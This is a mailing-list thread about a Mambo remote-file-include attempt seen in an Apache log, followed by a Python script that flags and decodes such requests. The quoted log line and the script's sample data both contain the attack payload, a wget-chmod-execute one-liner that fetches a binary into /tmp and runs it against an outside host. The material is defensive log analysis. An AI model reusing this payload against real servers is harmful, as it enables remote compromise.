Edward Shornock wrote:
>
> On Mon, Jan 23, 2006 at 08:31:40AM +0100, Maik Holtkamp wrote:
> > Hi,
> >
> > Yesterday morning I found a strange entry in my Apache log files (Debian
> > sarge, Apache 1.3, Mambo 4.5.3, kernel 2.4.31). It's a dyndns home-LAN
> > server, just serving my family and some good friends (normally).
> >
> > ---cut---
> > 132.248.204.65 - - [19/Jan/2006:07:08:32 +0100] "GET
> > /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%20212.20
> > 3.97.120/sexy;chmod%20744%20sexy;./sexy%2071.137.131.26%208080;00;echo%20YYY;echo|
> > HTTP/1.1" 200 28 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
> > ---cut---
> >
> > As I patched Mambo against the recent "register globals" attack and my /tmp
> > is mounted noexec, the attack doesn't exploit anything.
> >
> > However, I curiously downloaded this sexy executable to have a closer look.
> >
> > ---cut---
> > backup:/home/qmb# ./sexy -h
> > ./sexy <host> <port>
> > ---cut---
>
> Never run apps like this as root. Bad, bad idea.
There is an old saying in Germany: "Only damage makes you wise."

Even though the box I tried it on was on the second line and I did not pass any
arguments (IP/port) to the tool, I now see the chance that it would have
polluted the whole LAN and probably even found a way to the outside. Thank God
it wasn't that evil, so the Knoppix restore could fix the situation.

> If you want more information about this tool, google for "Linux.RST.B"
> or "Unix/RST.B".

Thank you very much.

--
- maik
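The request quoted above has a recognisable shape: `_REQUEST[...]` and `GLOBALS=` keys that only do anything against register_globals, `mosConfig_absolute_path` pointed at a remote URL (a remote file include), and a `cmd` parameter carrying a shell one-liner that fetches a binary into /tmp and runs it. The following triage script is an added example, not code from the thread or from Mambo; it is my own and it runs over constructed log lines in the same shape as the one in the post, with RFC 5737 documentation addresses in place of the original IPs. The parameter set, regexes and field names are assumptions chosen for the example.

```python
import re
from urllib.parse import unquote, urlsplit

# Apache "combined" log format as seen in the quoted post. The regex is my own.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Mambo configuration variable the quoted request overrides. With
# register_globals on and no patch, a remote URL here becomes a remote file
# include. Extend the set with other include-path parameters you know about.
INCLUDE_PARAMS = {"mosConfig_absolute_path"}
REMOTE_SCHEMES = ("http://", "https://", "ftp://")

# Download commands whose argument is worth pulling out as an indicator.
FETCH_RE = re.compile(r"\b(?:wget|curl|fetch|lynx)\s+(?:-\S+\s+)*(\S+)")

# Constructed sample lines in the shape of the one in the post; the addresses
# are RFC 5737 documentation ranges, not the ones from the original log.
SAMPLE_LINES = [
    '203.0.113.45 - - [19/Jan/2006:07:08:32 +0100] "GET /cvs/index2.php'
    '?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS='
    '&mosConfig_absolute_path=http://198.51.100.7/cmd.gif?'
    '&cmd=cd%20/tmp;wget%20198.51.100.20/sexy;chmod%20744%20sexy;'
    './sexy%20192.0.2.99%208080;00;echo%20YYY;echo| HTTP/1.1" 200 28 "-" '
    '"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"',
    '198.51.100.200 - - [19/Jan/2006:07:10:01 +0100] "GET /cvs/index2.php'
    '?option=com_content&Itemid=1 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
]


def parse_line(line):
    """Split one combined-log line into fields; None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def query_params(target):
    """Decode the query string by hand: the payload uses ';' inside values,
    which older parse_qs versions would treat as a separator."""
    query = target.partition("?")[2]
    params = []
    for part in query.split("&"):
        if part:
            key, _, val = part.partition("=")
            params.append((unquote(key), unquote(val)))
    return params


def host_of(url):
    """Hostname of a URL, tolerating the scheme-less form wget accepts."""
    if "://" not in url:
        url = "http://" + url
    return urlsplit(url).hostname


def analyse(line):
    """Classify one request; returns None for lines that are not Apache logs."""
    rec = parse_line(line)
    if rec is None:
        return None
    params = query_params(rec["target"])
    keys = [k for k, _ in params]
    # Superglobal overwrite: _REQUEST[...] or GLOBALS keys only make sense
    # against register_globals; nobody sends them by accident.
    register_globals = any(k == "GLOBALS" or k.startswith("_REQUEST[") for k in keys)
    remote_include = [(k, v) for k, v in params
                      if k in INCLUDE_PARAMS and v.lower().startswith(REMOTE_SCHEMES)]
    cmd = next((v for k, v in params if k == "cmd"), "")
    commands = [c.strip() for c in cmd.split(";") if c.strip()]
    iocs = {host_of(v) for _, v in remote_include}
    for c in commands:
        m = FETCH_RE.search(c)
        if m:
            iocs.add(host_of(m.group(1)))
    return {
        "src": rec["src"],
        "ts": rec["ts"],
        "status": rec["status"],
        "register_globals": register_globals,
        "remote_include": remote_include,
        "commands": commands,
        "iocs": sorted(h for h in iocs if h),
        "attack": bool(remote_include),
    }


def scan(lines):
    """Return the analysed records for every line that looks like an attack."""
    hits = []
    for line in lines:
        rec = analyse(line)
        if rec and rec["attack"]:
            hits.append(rec)
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LINES):
        print(hit["src"], hit["ts"], "RFI attempt, indicators:", ", ".join(hit["iocs"]))
        for c in hit["commands"]:
            print("   cmd:", c)
```

Run it against an access log with `scan(open("access.log"))`. The verdict is "attempt", not "compromise": a 200 with a small body says nothing either way, so confirm on the host (contents of /tmp, the process list, outbound connections to the extracted indicator hosts) rather than from the status code alone. The split command list is also the quickest way to see what the payload would have done, without executing anything, which is the step the original poster skipped.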